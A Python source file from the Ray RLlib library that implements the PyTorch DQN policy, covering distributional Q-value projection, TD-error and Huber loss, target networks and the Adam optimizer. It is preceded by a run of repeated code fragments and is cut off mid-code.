= v_min + z * (v_max - v_min)", "loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda", "q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"],", "cross entropy loss for # priority is robust and insensitive", "ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss,", "ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space,", "q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move", "def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]:", "def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]:", "the given state. 
one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum(", "torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta +", "policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device))", "= policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training,", "> 1: (action_scores, z, support_logits_per_action, logits, probs_or_logits) = model.get_q_value_distributions(model_out) else:", "1: support_logits_per_action_mean = torch.mean( support_logits_per_action, dim=1) support_logits_per_action_centered = ( support_logits_per_action", "action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn,", "= rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] =", "((v_max - v_min) / float(num_atoms - 1)) lb = torch.floor(b)", "= policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\",", "# Q scores for actions which we know were selected", "build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer,", "compute the error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach()", "TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException(", "# (batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size,", "self.td_error = q_t_selected - q_t_selected_target.detach() self.loss = torch.mean( importance_weights.float() *", "v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to add LayerNorm after", "ModelV2, obs: TensorType, explore, is_training: bool = False): config =", "* (v_max - v_min) / float(num_atoms - 1) # (batch_size,", "lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta", "obs_space, action_space, config) # Move target net to device (this", "\\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) q_tp1_best_using_online_net", "policy.target_q_func_vars = policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy,", "config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"],", "def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask, gamma=0.99,", "any other models the policy has). 
policy.target_q_model = policy.target_q_model.to(policy.device) def", "dim=1) support_logits_per_action_centered = ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action", "isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not supported", "= torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta", "state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t >", "= F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best * (ub - b", "from typing import Dict, List, Tuple import gym import ray", "Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy)", "logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores,", "apply_grad_clipping(policy, optimizer, loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist)", "done autoatically for the # policy.model, but not for any", "happens to be an integer, lb == ub, so pr_j(s',", "from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch() F", "policy.q_loss.loss def adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam(", "config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space, config:", "# policy.model, but not for any other models the policy", "q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target", "# compute the error (potentially clipped) self.td_error = q_t_selected -", "net to device (this is done autoatically for the #", "probs_or_logits) = model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if", "{\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution,", "q_vals return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy: Policy,", "QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"],", "support_logits_per_action = torch.unsqueeze( state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax(", "TODO(sven): Move option to add LayerNorm after each Dense #", "FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum(", "TensorType, TrainerConfigDict torch, nn = try_import_torch() F = None if", "gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space {} is not supported for", "torch.unsqueeze(ml_delta, -1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1),", "ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import", "reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze( 
advantages_mean, 1) value", "def compute_q_values(policy: Policy, model: ModelV2, obs: TensorType, explore, is_training: bool", "so pr_j(s', a*) will # be discarded because (ub-b) ==", "obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward", "v_max) b = (r_tau - v_min) / ((v_max - v_min)", "Dense # generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\",", "Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from", "if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model,", "actions which we know were selected in the given state.", "error attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error =", "= ( support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze(", "Policy, input_dict, state_batches, model, action_dist) -> Dict[str, TensorType]: return {\"q_values\":", "# state-out def build_q_losses(policy: Policy, model, _, train_batch: SampleBatch) ->", "TorchCategorical, [] # state-out def build_q_losses(policy: Policy, model, _, train_batch:", "import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise", "b = (r_tau - v_min) / ((v_max - v_min) /", "model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None) if config[\"num_atoms\"]", "= obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do", "== \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\",", "\"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class", "obs: TensorType, explore, is_training: bool = False): config = policy.config", "\"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked = (1.0 - done_mask) *", "obs_tp1, done_mask, importance_weights): input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t}) input_dict[SampleBatch.ACTIONS] = act_t", "support_prob_per_action else: advantages_mean = reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores -", "{ # TODO: better Q stats for dist dqn \"mean_td_error\":", "num_atoms, num_atoms) u_project = F.one_hot(ub.long(), num_atoms) ml_delta = q_probs_tp1_best *", "Dict, List, Tuple import gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import", "in most implementations # when b happens to be an", "= torch.mean(self.td_error * importance_weights) self.stats = { # TODO: better", "self.loss = torch.mean(self.td_error * importance_weights) self.stats = { # TODO:", "1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS],", "policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\", loss_fn=build_q_losses, get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class,", "ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG, 
make_model_and_action_dist=build_q_model_and_distribution, action_distribution_fn=get_distribution_inputs_and_class, stats_fn=build_q_stats, postprocess_fn=postprocess_nstep_and_prio, optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\":", "torch.unsqueeze( rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask,", "1) # (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms)", "# try to infer the last layer size, otherwise fall", "# priority is robust and insensitive to `prioritized_replay_alpha` self.td_error =", "support_logits_per_action) value = torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action", "import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch", "build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from", "Distributional Q-learning which corresponds to an entropy loss z =", "* torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best possible", "Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise UnsupportedSpaceException( \"Action space", "is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: # try to", "optimizer_fn=adam_optimizer, extra_grad_process_fn=grad_process_and_td_error_fn, extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[", "l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms) u_project =", "Policy, model, _, train_batch: SampleBatch) -> TensorType: config = policy.config", "*, explore: bool = True, is_training: bool = False, **kwargs)", "q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False,", "q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True)", "obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy,", "policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy: Policy, model: ModelV2,", "F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN, q_t, torch.tensor(0.0,", "= policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t = compute_q_values(", "q_logits_tp1, q_probs_tp1 = compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) #", "Policy, batch) -> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, },", "action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy:", "z = torch.range(0.0, num_atoms - 1, dtype=torch.float32) z = v_min", "= state_score + advantages_centered else: value = action_scores return value,", "LayerNorm after each Dense # generically into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.q_func_vars", "dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean =", "input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS] = importance_weights #", "v_min, v_max) b = (r_tau - v_min) / ((v_max -", "because (ub-b) == (b-lb) == 0. floor_equal_ceil = (ub -", "(batch_size, num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms,", "better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else:", "/ float(num_atoms - 1) # (batch_size, 1) * (1, num_atoms)", "- done_mask, -1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min,", "softmax_cross_entropy_with_logits( logits=q_logits_t_selected, labels=m) self.loss = torch.mean(self.td_error * importance_weights) self.stats =", "num_atoms) ml_delta = q_probs_tp1_best * (ub - b + floor_equal_ceil)", "-> Tuple[TensorType, type, List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore,", "for actions which we know were selected in the given", "setup_early_mixins(policy: Policy, obs_space, action_space, config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"],", "= None if nn: F = nn.functional class QLoss: def", "adam_optimizer(policy: Policy, config: TrainerConfigDict) -> \"torch.optim.Optimizer\": return torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr,", "-> Dict[str, TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def", "import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import (", "num_atoms, num_atoms) l_project = F.one_hot(lb.long(), num_atoms) # (batch_size, num_atoms, num_atoms)", "from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy", "-1), dim=1) mu_delta = torch.sum( u_project * torch.unsqueeze(mu_delta, -1), dim=1)", "into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or", "torch.optim.Adam( policy.q_func_vars, lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str,", "gamma**n_step * q_tp1_best_masked # compute the error (potentially clipped) self.td_error", "q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1", "ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn = try_import_torch() F =", "(1.0 - done_mask) * q_tp1_best # compute RHS of bellman", "ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space,", "ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy", "from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf,", "torch, nn = try_import_torch() F = None if nn: F", "- v_min) / float(num_atoms - 1)) lb = torch.floor(b) ub", "entropy loss for # priority is robust and insensitive to", "q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return", "is_training=True) # Target Q-network evaluation. 
q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values(", "is_training, }, [], None) if config[\"num_atoms\"] > 1: (action_scores, z,", "+ z * (v_max - v_min) / float(num_atoms - 1)", "torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 *", "config = policy.config # Q-network evaluation. q_t, q_logits_t, q_probs_t =", "v_min) / float(num_atoms - 1) # (batch_size, 1) * (1,", "1, dtype=torch.float32) z = v_min + z * (v_max -", "# (batch_size, 1) * (1, num_atoms) = (batch_size, num_atoms) r_tau", "value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType)", "q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"], config[\"v_min\"], config[\"v_max\"]) return", "policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin, LearningRateSchedule,", "torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot(", "rewards, -1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1)", "q_tp1_best_masked # compute the error (potentially clipped) self.td_error = q_t_selected", "DQNTorchModel from ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from", "other models the policy has). policy.target_q_model = policy.target_q_model.to(policy.device) def compute_q_values(policy:", "torch.mean(self.td_error), } class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t,", "model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"],", "= torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection =", "ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"],", "of best possible value starting from state at t +", "ml_delta + mu_delta # Rainbow paper claims that using this", "torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected,", "QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards, done_mask,", "* huber_loss(self.td_error)) self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\":", "q_probs_tp1_best * (b - lb) ml_delta = torch.sum( l_project *", "policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model: ModelV2, obs_batch: TensorType,", "def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict)", "torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum( q_logits_t *", "action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy: Policy, 
optimizer: \"torch.optim.Optimizer\",", "model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], #", "dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option", "List[TensorType]]: q_vals = compute_q_values(policy, model, obs_batch, explore, is_training) q_vals =", "torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b = (r_tau", "= torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) * q_tp1_best_one_hot_selection,", "done_mask) * q_tp1_best # compute RHS of bellman equation q_t_selected_target", "ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper)", "-1) + gamma**n_step * torch.unsqueeze( 1.0 - done_mask, -1) *", "v_min + z * (v_max - v_min) / float(num_atoms -", "ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch", "(1, num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1)", "= reduce_mean_ignore_inf(action_scores, 1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1)", "* torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b =", "1) advantages_centered = action_scores - torch.unsqueeze( advantages_mean, 1) value =", "= model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] >", "* q_tp1_best_one_hot_selection, 1) q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1),", "torch.floor(b) ub = torch.ceil(b) # Indispensable judgement which is missed", "config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n # TODO(sven):", "num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"], # TODO(sven): Move option to", "know were selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS],", "ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops import", "= { # TODO: better Q stats for dist dqn", "gym import ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import", "back to 256 num_outputs = ([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] =", "state at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\", "dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy, obs_space, action_space,", "eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return dict({", "into ModelCatalog. 
add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space,", "else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best = torch.sum(", "lr=policy.cur_lr, eps=config[\"adam_epsilon\"]) def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]: return", "obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_TARGET_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"],", "-1) * torch.unsqueeze(z, 0) r_tau = torch.clamp(r_tau, v_min, v_max) b", "space {} is not supported for DQN.\".format(action_space)) if config[\"hiddens\"]: #", "(b - lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1),", "selected in the given state. one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected", "state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, }, [], None)", "ray.rllib.utils.torch_ops import (FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType,", "to an entropy loss z = torch.range(0.0, num_atoms - 1,", "self.stats = { # TODO: better Q stats for dist", "* importance_weights) self.stats = { # TODO: better Q stats", "-> Dict[str, TensorType]: return {\"q_values\": policy.q_values} DQNTorchPolicy = build_torch_policy( name=\"DQNTorchPolicy\",", "= (1.0 - done_mask) * q_tp1_best # compute RHS of", "rewards, done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms >", "ray from ray.rllib.agents.a3c.a3c_torch_policy import apply_grad_clipping from ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS,", "<reponame>ThomasLecat/ray from typing import Dict, List, Tuple import gym import", "import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import", "is missed in most implementations # when b happens to", "- lb < 0.5).float() # (batch_size, num_atoms, num_atoms) l_project =", "from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist import (TorchCategorical, TorchDistributionWrapper) from", "from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework import try_import_torch from ray.rllib.utils.torch_ops", "config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n # TODO(sven): Move", "FLOAT_MIN, q_t, torch.tensor(0.0, device=policy.device)) * one_hot_selection, 1) q_logits_t_selected = torch.sum(", "= torch.sum(z * support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits =", "\"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"] == \"ParameterNoise\") policy.q_model = ModelCatalog.get_model_v2(", "num_atoms=1, v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional Q-learning", "loss for # priority is robust and insensitive to `prioritized_replay_alpha`", "from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise import ParameterNoise from ray.rllib.utils.framework", "* torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1),", "dim=1) mu_delta = torch.sum( u_project * 
torch.unsqueeze(mu_delta, -1), dim=1) m", "bellman equation q_t_selected_target = rewards + gamma**n_step * q_tp1_best_masked #", "\"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\": torch.mean(self.td_error), } class ComputeTDErrorMixin: def", "bool = True, is_training: bool = False, **kwargs) -> Tuple[TensorType,", "from ray.rllib.policy.torch_policy_template import build_torch_policy from ray.rllib.utils.error import UnsupportedSpaceException from ray.rllib.utils.exploration.parameter_noise", "-> TensorType: config = policy.config # Q-network evaluation. q_t, q_logits_t,", "-> None: ComputeTDErrorMixin.__init__(policy) TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target", "* support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else:", "extra_learn_fetches_fn=lambda policy: {\"td_error\": policy.q_loss.td_error}, extra_action_out_fn=extra_action_out_fn, before_init=setup_early_mixins, after_init=after_init, mixins=[ TargetNetworkMixin, ComputeTDErrorMixin,", "-1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n) q_tp1_best", "last layer size, otherwise fall back to 256 num_outputs =", "q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals policy.q_values =", "def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask, importance_weights): input_dict", "= ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"], framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"],", "when b happens to be an integer, lb == ub,", "an integer, lb == ub, so pr_j(s', a*) will #", "v_min=-10.0, v_max=10.0): if num_atoms > 1: # Distributional Q-learning which", "- v_min) / ((v_max - v_min) / float(num_atoms - 1))", "self.stats = { \"mean_q\": torch.mean(q_t_selected), \"min_q\": torch.min(q_t_selected), \"max_q\": torch.max(q_t_selected), \"mean_td_error\":", "\"mean_td_error\": torch.mean(self.td_error), } class 